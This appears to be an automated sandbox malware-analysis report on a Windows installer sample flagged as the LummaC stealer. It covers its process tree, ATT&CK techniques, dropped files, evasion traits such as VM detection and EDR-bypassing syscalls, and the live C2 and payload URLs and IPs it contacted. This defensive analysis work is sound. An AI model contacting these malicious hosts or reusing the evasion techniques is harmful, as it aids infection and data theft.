      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Abuse Elevation Control Mechanism
      1
      Deobfuscate/Decode Files or Information
      2
      OS Credential Dumping
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Abuse Elevation Control Mechanism
      11
      Input Capture
      13
      File and Directory Discovery
      Remote Desktop Protocol31
      Data from Local System
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Command and Scripting Interpreter
      Logon Script (Windows)12
      Process Injection
      2
      Obfuscated Files or Information
      Security Account Manager226
      System Information Discovery
      SMB/Windows Admin Shares11
      Input Capture
      3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell
      Login HookLogin Hook1
      DLL Side-Loading
      NTDS521
      Security Software Discovery
      Distributed Component Object Model1
      Clipboard Data
      14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
      Masquerading
      LSA Secrets3
      Process Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
      Virtualization/Sandbox Evasion
      Cached Domain Credentials221
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
      Process Injection
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
      System Owner/User Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582040 Sample: @Setup.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 95 dfgh.online 2->95 97 battlecaredh.click 2->97 99 3 other IPs or domains 2->99 119 Suricata IDS alerts for network traffic 2->119 121 Antivirus detection for URL or domain 2->121 123 Multi AV Scanner detection for submitted file 2->123 125 4 other signatures 2->125 14 @Setup.exe 23 2->14         started        signatures3 process4 process5 16 cmd.exe 2 14->16         started        file6 75 C:\Users\user\AppData\...\Corporation.com, PE32 16->75 dropped 117 Drops PE files with a suspicious file extension 16->117 20 Corporation.com 1 16->20         started        25 cmd.exe 1 16->25         started        27 cmd.exe 2 16->27         started        29 9 other processes 16->29 signatures7 process8 dnsIp9 101 battlecaredh.click 104.21.32.1, 443, 49739, 49740 CLOUDFLARENETUS United States 20->101 103 cegu.shop 185.161.251.21, 443, 49749 NTLGB United Kingdom 20->103 105 klipvumisui.shop 104.21.37.128, 443, 49750 CLOUDFLARENETUS United States 20->105 77 C:\...\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, PE32 20->77 dropped 127 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->127 129 Suspicious powershell command line found 20->129 131 Query firmware table information (likely to detect VMs) 20->131 133 3 other signatures 20->133 31 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe 2 20->31         started        35 powershell.exe 15 15 20->35         started        file10 signatures11 process12 file13 93 C:\...\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, PE32 31->93 dropped 107 Multi AV Scanner detection for dropped file 31->107 37 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp 31->37         started        40 conhost.exe 35->40         started        signatures14 process15 file16 79 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 37->79 dropped 81 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 37->81 dropped 42 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe 37->42         started        process17 file18 83 C:\...\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, PE32 42->83 dropped 45 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp 42->45         started        process19 file20 85 C:\Users\user\AppData\...\is-GC8MC.tmp, PE32 45->85 dropped 87 C:\Users\user\...\BrightLib.exe (copy), PE32 45->87 dropped 89 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 45->89 dropped 91 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 45->91 dropped 48 BrightLib.exe 45->48         started        51 cmd.exe 45->51         started        53 cmd.exe 45->53         started        55 5 other processes 45->55 process21 signatures22 109 Tries to detect virtualization through RDTSC time measurements 48->109 111 Sample or dropped binary is a compiled AutoHotkey binary 48->111 113 Switches to a custom stack to bypass stack traces 48->113 115 Found direct / indirect Syscall (likely to bypass EDR) 48->115 57 conhost.exe 51->57         started        59 tasklist.exe 51->59         started        61 find.exe 51->61         started        63 conhost.exe 53->63         started        65 tasklist.exe 53->65         started        67 find.exe 53->67         started        69 conhost.exe 55->69         started        71 conhost.exe 55->71         started        73 11 other processes 55->73 process23

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      @Setup.exe24%VirustotalBrowse
      @Setup.exe16%ReversingLabsWin32.Trojan.Generic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe14%ReversingLabsWin32.Trojan.Hulk
      C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp3%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_isdecmp.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_setup64.tmp0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp3%ReversingLabs
      C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
      C:\Users\user\AppData\Roaming\ColorStreamLib\is-GC8MC.tmp8%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://battlecaredh.click/api0%Avira URL Cloudsafe
      https://dfgh.online/invoker.php?compName=0%Avira URL Cloudsafe
      https://dfgh.online0%Avira URL Cloudsafe
      http://www.autohotkey.comCould0%Avira URL Cloudsafe
      https://cegu.shop/8574262446/ph.txt100%Avira URL Cloudmalware
      http://crl.usertru0%Avira URL Cloudsafe
      http://michaeluno.jp/40%Avira URL Cloudsafe
      http://crl.usertr0%Avira URL Cloudsafe
      https://klipvumisui.shop/int_clp_sha.txt100%Avira URL Cloudmalware
      https://dfgh.online/invoker.php?compName=user-PC0%Avira URL Cloudsafe
      http://michaeluno.jp/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      cegu.shop
      185.161.251.21
      truefalse
        high
        battlecaredh.click
        104.21.32.1
        truetrue
          unknown
          klipvumisui.shop
          104.21.37.128
          truefalse
            high
            ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpK
            unknown
            unknownfalse
              unknown
              dfgh.online
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://battlecaredh.click/apitrue
                • Avira URL Cloud: safe
                unknown
                https://klipvumisui.shop/int_clp_sha.txtfalse
                • Avira URL Cloud: malware
                unknown
                https://cegu.shop/8574262446/ph.txtfalse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000000.2225738672.0000000000231000.00000020.00000001.01000000.0000000A.sdmpfalse
                  high
                  http://repository.certum.pl/cscasha2.cer034ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                    high
                    http://ocsp.sectigo.com034ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                      high
                      http://crl.usertr34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.microsoft.copowershell.exe, 00000011.00000002.2076683516.0000000007BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://ocsps.ssl.com0@Setup.exefalse
                            high
                            https://dfgh.online/invoker.php?compName=powershell.exe, 00000011.00000002.2072370241.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2072305436.0000000003710000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2071500735.0000000003500000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0@Setup.exefalse
                              high
                              http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_@Setup.exefalse
                                high
                                https://www.autoitscript.com/autoit3/Spotlight.8.drfalse
                                  high
                                  http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0@Setup.exefalse
                                    high
                                    https://aka.ms/pscore6lBpowershell.exe, 00000011.00000002.2072630707.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.remobjects.com/ps34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2231893927.000000007F6CB000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2229028460.000000000290F000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000000.2235340133.0000000000021000.00000020.00000001.01000000.0000000B.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000000.2253869149.000000000102D000.00000020.00000001.01000000.0000000D.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drfalse
                                        high
                                        http://crt.sectigo.com/Sectig34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          http://subca.ocsp-certum.com0134ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                            high
                                            https://contoso.com/powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.innosetup.com/34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2231893927.000000007F6CB000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2229028460.000000000290F000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000000.2235340133.0000000000021000.00000020.00000001.01000000.0000000B.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000000.2253869149.000000000102D000.00000020.00000001.01000000.0000000D.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drfalse
                                                  high
                                                  https://www.ssl.com/repository0@Setup.exefalse
                                                    high
                                                    https://sectigo.com/CPS0D34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                      high
                                                      https://dfgh.onlinepowershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://jrsoftware.org034ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                        high
                                                        https://jrsoftware.org/34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                          high
                                                          https://dfgh.online/invoker.php?compname=powershell.exe, 00000011.00000002.2076923392.0000000007BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.autohotkey.comCouldBrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2072630707.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.certum.pl/CPS034ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                high
                                                                http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://sectigo.com/CPS034ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://michaeluno.jp/4BrightLib.exe, 00000032.00000002.2699234063.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://repository.certum.pl/ctnca.cer0934ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                      high
                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.certum.pl/ctnca.crl0k34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                          high
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://go.micropowershell.exe, 00000011.00000002.2072630707.00000000058E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/Iconpowershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.autoitscript.com/autoit3/XCorporation.com, 0000000C.00000000.1695003459.0000000000F55000.00000002.00000001.01000000.00000007.sdmp, Spotlight.8.dr, Corporation.com.1.drfalse
                                                                                  high
                                                                                  http://www.autohotkey.comBrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drfalse
                                                                                    high
                                                                                    http://nsis.sf.net/NSIS_ErrorError@Setup.exefalse
                                                                                      high
                                                                                      https://www.certum.pl/CPS034ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                        high
                                                                                        http://crl.certum.pl/cscasha2.crl0q34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                          high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.usertru34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://cscasha2.ocsp-certum.com0434ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                              high
                                                                                              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                high
                                                                                                https://dfgh.online/invoker.php?compName=user-PCpowershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                  high
                                                                                                  http://www.info-zip.org/BrightLib.exe, 00000032.00000002.2724573015.0000000039F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://michaeluno.jp/BrightLib.exe, 00000032.00000002.2702726581.000000000625A000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2699970820.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000000.2656238090.0000000000AEE000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2699234063.0000000003170000.00000004.00000020.00020000.00000000.sdmp, is-GC8MC.tmp.22.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0@Setup.exefalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.37.128
                                                                                                      klipvumisui.shopUnited States
                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                      104.21.32.1
                                                                                                      battlecaredh.clickUnited States
                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                      185.161.251.21
                                                                                                      cegu.shopUnited Kingdom
                                                                                                      5089NTLGBfalse
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1582040
                                                                                                      Start date and time:2024-12-29 16:35:37 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 9m 55s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:51
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:@Setup.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@84/35@5/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 33.3%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target BrightLib.exe, PID 3612 because there are no executed function
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6468 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      TimeTypeDescription
                                                                                                      10:36:27API Interceptor1x Sleep call for process: @Setup.exe modified
                                                                                                      10:36:30API Interceptor10x Sleep call for process: Corporation.com modified
                                                                                                      10:37:07API Interceptor7x Sleep call for process: powershell.exe modified
                                                                                                      10:38:06API Interceptor1x Sleep call for process: BrightLib.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.37.128installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                            • redroomaudio.com/administrator/index.php
                                                                                                            185.161.251.21Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                              MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                  !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
